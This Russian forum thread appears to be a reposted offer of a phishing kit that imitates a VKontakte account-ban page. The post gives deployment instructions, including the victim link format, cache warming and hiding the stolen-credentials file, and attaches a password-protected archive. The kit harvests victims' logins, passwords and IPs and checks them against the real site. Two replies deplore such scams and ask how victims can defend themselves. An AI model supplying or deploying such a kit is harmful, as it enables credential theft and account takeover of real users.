• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Описание Фейк страницы ВК [новый дизайн]


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Тема скопипизжена с ifud.ws (будем считать его первоисточником).

Здравствуйте!
Завалялась недавняя собственная разработка для одной целевой атаки (подобный фейк активно используется "взломщиками", с ценником от 3500р и выше, разной степени наглости), а некоторые им даже барыжат.

Работа фейка разделена на три стадии :

Стадия I - жертва переходит по ссылке "взломщика" и видит свою страницу на 1.5 сек (было сделано исходя из гипотезы, что человек увидев "свое" подсознательно повысит уровень доверия). Через 1.5 сек происходит редирект на стадию II

Стадия II - жертва видит форму, со случайно созданным временем (время останется одно и то же, для последующих визитов), и стандартную форму ВК о блокировке страницы за рассылку спама (см. скриншот под спойлером). Фейк сам распарсит страницу жертвы по переданному в ссылке ID, заберет оттуда имя и аватарку

1.png

Стадия III - жертве предлагается ввести логин и пароль для подтверждения доступа (во избежание бана). Присутствует валидация - при неправильно введенном логине и пароле поля подсветятся красноватым (как в оригинальном ВК), пропустит только правильный логин/пароль. После ввода, жертва будет направлена на оригинальный контакт (и выдохнет с облегчением)

После того, как жертва поведется на фейк есть шанс что она побежит менять логин-пароль, поэтому форму можно легко переделать под смену пароля



Как использовать фейк :


Заливаем на хостинг, даем файлам необходимые права.
Жертве даем ссылку вида : yoursite.com/user.php?id={USER_ID}&to=validation, где вместо {USER_ID} - id'шник жертвы (только цифры! без приставки id и спецадресов типа durov)

Нужно заметить несколько пунктов :

- Свою страницу жертва видит через api скриншотера веб-страниц, при первом визите скриншотер может думать долго, поэтому лучше "прогреть кэш"- зайти сначала самому, и далее он будет работать мгновенно
- Для скриншотера нужен api key, менять его в файле user.php, строка 5 ($screenshot_key=), для удобства я приложил тестовый, в крайнем случае можно использовать его
2.png


-Фейк был частью системы фейков, поэтому админку не прикладываю. Логины-пароли-IP будут в файлике data.json, его лучше предварительно закрыть с помощью .htaccess
-Пользователь после успешной авторизации больше не сможет посетить фейк, устанавливается кука при наличии которой его будет сразу перенаправлять на vk.com/support

Пасс на архив:111
 

Вложения

  • VK.zip
    550.5 КБ · Просмотры: 476

Юля

Уважаемый пользователь
Форумчанин
Регистрация
19.01.2017
Сообщения
176
Репутация
40
Блин,сколько лет этим лохотронам...и до сих пор работает!
Нечто похожее приходило и мне в контакте. Я написала сообщение в поддержку , да— это мы, ответили, мол кто-то пытался зайти в мой аккаунт, поэтому-то и проверяем иногда:) Печально, что достижения талантливых программистов попадает в руки тех — чей ум поставлен на службу подлостям. Антоха, так Вы бы сразу и написали, как от него жертве избавиться, или хотя бы некую инструкцию, ведь , наверное антивирусы не помогут?
 

Юля

Уважаемый пользователь
Форумчанин
Регистрация
19.01.2017
Сообщения
176
Репутация
40
а еще стадия 4 полученные данные отправляются автору, там нужно копать и искоренить это
блокнотом, сохранить как, выбираете кодировку, потм эту даете документу расширение HTML. я так делала...
 
Верх Низ